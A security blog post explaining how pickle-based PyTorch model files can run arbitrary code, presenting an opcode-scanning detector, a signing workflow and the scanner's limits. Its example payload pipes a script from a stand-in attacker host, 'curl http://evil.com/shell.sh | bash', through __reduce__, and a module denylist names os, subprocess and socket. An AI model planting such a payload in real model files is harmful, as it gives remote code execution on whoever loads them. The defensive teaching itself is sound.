Your PyTorch Model File Can Execute Arbitrary Code — Here's How I Built a Scanner to Detect It

#security #python #machinelearning #pytorch

Unless the restricted weights_only=True mode is in effect (the default since PyTorch 2.6), torch.load("model.pt") runs whatever code the file's pickle stream tells it to. Not "could theoretically execute": actually executing. The pickle format that PyTorch uses for serialization has a built-in code execution mechanism, and it's trivial to exploit.

I built a tool to detect this. Here's what I learned.

The Attack: 4 Lines of Code

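import os
import pickle

class Backdoor:
    # pickle calls __reduce__ to learn how to rebuild this object on load
    def __reduce__(self):
        return (os.system, ("curl http://evil.com/shell.sh | bash",))

# Serializing is harmless; the command runs when someone loads the payload
payload = pickle.dumps(Backdoor())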

That's it. When someone loads this pickle — whether it's disguised as a model checkpoint, a dataset, or a config file — the command executes. No warnings. No prompts.
Full RCE.

The __reduce__ method tells pickle how to reconstruct an object. But "reconstruct" means "call this function with these arguments." Any function. Any arguments.
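To see the mechanism without running anything dangerous, here is a minimal sketch that swaps os.system for the harmless built-in len. The Demo class is a hypothetical stand-in, not part of the scanner. Notice that loading the payload does not give back a Demo object at all; it gives back whatever the chosen function returned.

```python
import pickle


class Demo:
    def __reduce__(self):
        # Harmless stand-in for os.system: ask pickle to call len("hello").
        return (len, ("hello",))


payload = pickle.dumps(Demo())

# Unpickling calls len("hello") and hands back its return value.
result = pickle.loads(payload)

print(type(result).__name__, result)
```

Replace len with any importable callable and the loader will call that instead, which is the whole problem.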

Why This Matters for ML

ML models are distributed as serialized files:

PyTorch .pt files are ZIP archives containing pickles
Scikit-learn models are pickled directly
HuggingFace Hub hosts thousands of user-uploaded model files

In 2023, HuggingFace found malicious pickles in uploaded models. This isn't theoretical — it's happening.
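Because a .pt file is a ZIP archive, the embedded pickle can be pulled out with the standard library alone, without importing torch or loading anything. The sketch below is illustrative: extract_pickles is a hypothetical helper, and the archive is a stand-in built in memory whose member names only mimic the layout a real checkpoint is assumed to have.

```python
import io
import pickle
import zipfile


def extract_pickles(archive_bytes: bytes) -> dict[str, bytes]:
    """Map each .pkl member name in a ZIP archive to its raw bytes."""
    with zipfile.ZipFile(io.BytesIO(archive_bytes)) as archive:
        return {
            name: archive.read(name)
            for name in archive.namelist()
            if name.endswith(".pkl")
        }


# Build a stand-in archive in memory. This is not a real checkpoint;
# the member names are assumptions chosen for the example.
buffer = io.BytesIO()
with zipfile.ZipFile(buffer, "w") as archive:
    archive.writestr("model/data.pkl", pickle.dumps({"layer": [0.1, 0.2]}))
    archive.writestr("model/version", "3")

members = extract_pickles(buffer.getvalue())
print(sorted(members))
```

The raw bytes returned here are what a scanner would inspect; nothing in this snippet unpickles them.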

How Detection Works: Opcode Disassembly

Python's pickletools module can disassemble pickle bytecode without executing it. Here's what a malicious pickle looks like at the opcode level:

PROTO 4
FRAME 25
SHORT_BINUNICODE 'nt' ← module name (os on Windows)
SHORT_BINUNICODE 'system' ← function name
STACK_GLOBAL ← load nt.system as callable
SHORT_BINUNICODE 'whoami' ← argument
TUPLE1 ← pack into tuple
REDUCE ← CALL the function
STOP
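A listing like the one above can be produced with pickletools.dis, which only reads the bytes and never calls anything. This is a small sketch using a harmless payload (len instead of system), so the module and function names in its output will differ from the listing; the Demo class is a hypothetical example.

```python
import io
import pickle
import pickletools


class Demo:
    def __reduce__(self):
        # Harmless stand-in: the pickle will reference builtins.len.
        return (len, ("hello",))


payload = pickle.dumps(Demo(), protocol=4)

# dis() writes a human-readable opcode listing; it does not execute REDUCE.
buffer = io.StringIO()
pickletools.dis(payload, out=buffer)
listing = buffer.getvalue()

print(listing)
```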

The key insight: STACK_GLOBAL loads a callable by module + name, and REDUCE executes it. If the module is os (which shows up as nt or posix in the actual bytecode), subprocess, socket, or builtins, treat the pickle as malicious.
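Here is a minimal sketch of that check, built on pickletools.genops. It is not the scanner's actual code: find_suspicious_imports and the denylist are assumptions made for illustration, and the "last two strings" heuristic for STACK_GLOBAL will miss payloads that fetch the names from the memo instead of pushing them directly.

```python
import os
import pickle
import pickletools

# Assumed denylist for illustration; a real scanner needs a longer one.
SUSPICIOUS_MODULES = {"os", "nt", "posix", "subprocess", "socket", "builtins"}


def find_suspicious_imports(data: bytes) -> list[str]:
    """Return 'module.name' for each denylisted import, without unpickling."""
    findings = []
    recent_strings = []  # string arguments seen so far, used by STACK_GLOBAL
    for opcode, arg, _pos in pickletools.genops(data):
        if opcode.name in ("GLOBAL", "INST"):
            # Older protocols carry "module name" as a single argument.
            module, _, name = arg.partition(" ")
        elif opcode.name == "STACK_GLOBAL":
            # Protocol 4+ pushes module and name as two separate strings.
            if len(recent_strings) < 2:
                continue
            module, name = recent_strings[-2], recent_strings[-1]
        else:
            if isinstance(arg, str):
                recent_strings.append(arg)
            continue
        if module.split(".")[0] in SUSPICIOUS_MODULES:
            findings.append(f"{module}.{name}")
    return findings


class Probe:
    def __reduce__(self):
        return (os.system, ("echo hi",))  # serialized below, never loaded


hits = find_suspicious_imports(pickle.dumps(Probe(), protocol=4))
print(hits)
```

The function only walks the opcode stream, so scanning a hostile file does not trigger its payload.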

My Scanner:

I built Model-Supply-Chain-Auditor (https://github.com/poojakira/Model-Supply-Chain-Auditor) to parse these opcodes and flag dangerous patterns:

from src.scanners import scan_pickle_bytes

result = scan_pickle_bytes(suspicious_data)
print(result.risk_level) # "malicious"
print(result.findings) # ["DANGEROUS import: nt.system", "Code execution via REDUCE"]

It handles pickle protocols 0-5, including the protocol 4+ STACK_GLOBAL pattern where module and name are pushed to the stack separately.

What I Got Wrong Initially

On Windows, os.system pickles as nt.system. On Linux, it's posix.system. My first version only checked for os and missed both platform-specific variants. Lesson: always test on actual bytecode output, not what you think it should be.
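A quick way to check what actually ends up in the bytes is to ask the function for its __module__ and compare that with the strings in the serialized stream. This is a small sketch; the Probe class is a hypothetical example and the payload is only serialized, never loaded.

```python
import os
import pickle
import pickletools

# pickle records the module the function reports for itself, not "os".
print(os.system.__module__)  # 'posix' on Linux/macOS, 'nt' on Windows


class Probe:
    def __reduce__(self):
        return (os.system, ("echo hi",))  # serialized below, never loaded


# Collect every string argument in the opcode stream.
strings = [
    arg
    for _opcode, arg, _pos in pickletools.genops(pickle.dumps(Probe(), protocol=4))
    if isinstance(arg, str)
]
print(strings)
```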

The Defense: Model Signing

Detection is reactive. The proactive defense is cryptographic signing:

After training, compute SHA-256 of the model file
Sign the hash with Ed25519
Before loading, verify signature against a trusted public key

If the signature doesn't match, don't load it.
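The hashing half of this workflow needs only the standard library. The sketch below deliberately leaves out the Ed25519 step, since Python's standard library has no Ed25519 implementation; in a real pipeline the recorded digest would be signed, and the signature verified against the trusted public key before the digest is believed. The helper names and the temporary file are assumptions for illustration.

```python
import hashlib
import hmac
import tempfile
from pathlib import Path


def sha256_of_file(path: Path, chunk_size: int = 1 << 20) -> str:
    """Hash a file in chunks so large checkpoints do not need to fit in memory."""
    digest = hashlib.sha256()
    with path.open("rb") as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def digest_matches(path: Path, expected_hex: str) -> bool:
    """Compare the file's digest with the recorded one in constant time."""
    return hmac.compare_digest(sha256_of_file(path), expected_hex)


with tempfile.TemporaryDirectory() as tmp:
    model_path = Path(tmp) / "model.pt"
    model_path.write_bytes(b"stand-in model bytes")

    recorded = sha256_of_file(model_path)  # publisher side, after training
    ok_before = digest_matches(model_path, recorded)

    model_path.write_bytes(b"tampered bytes")  # simulate a swapped file
    ok_after = digest_matches(model_path, recorded)

print(ok_before, ok_after)
```

A bare digest only helps if it reaches you over a channel the attacker cannot also modify, which is the gap the signature is meant to close.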

What This Doesn't Solve

Obfuscated payloads — Lambda chains and builtins tricks can evade pattern matching
Semantic backdoors — A model can be backdoored at the weight level without malicious pickle code
SafeTensors — HuggingFace's format eliminates this entire attack class by design. Use it when possible.

The Takeaway:

If you're downloading model files from the internet: